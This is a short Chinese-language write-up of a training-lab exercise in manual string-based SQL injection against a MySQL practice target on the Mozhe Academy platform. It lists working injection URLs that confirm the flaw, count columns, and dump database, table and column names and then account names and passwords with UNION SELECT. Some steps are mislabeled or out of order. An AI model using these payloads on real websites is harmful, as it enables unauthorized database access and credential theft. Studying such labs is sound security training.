声明

环境

墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符型)

判断是否存在漏洞

http://124.70.64.48:42937/new_list.php?id=tingjigonggao' and '1'='2'--+

and '1'='1'正常

http://124.70.64.48:42937/new_list.php?id=tingjigonggao' and '1'='2'--+

and '1'='2'出错，存在字符型注入漏洞

判断字段数

http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,3,4 --+

字段数判断为4

爆数据库

http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,database(),4 --+

爆出数据库mozhe_discuz_stormgroup

http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name = 'stormgroup_member'--+

爆表

http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema = 'mozhe_discuz_stormgroup'--+

爆出数据表notice和stormgroup_member，分析stormgroup_member表包含账号密码

爆字段

http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name = 'stormgroup_member'--+

爆出表stormgroup_member的所有字段id、name、password、status

爆数据

http://124.70.64.48:42937/new_list.php?id=1' union select 1,2,group_concat(id,',',name,',',password),4 from stormgroup_member where id=1--+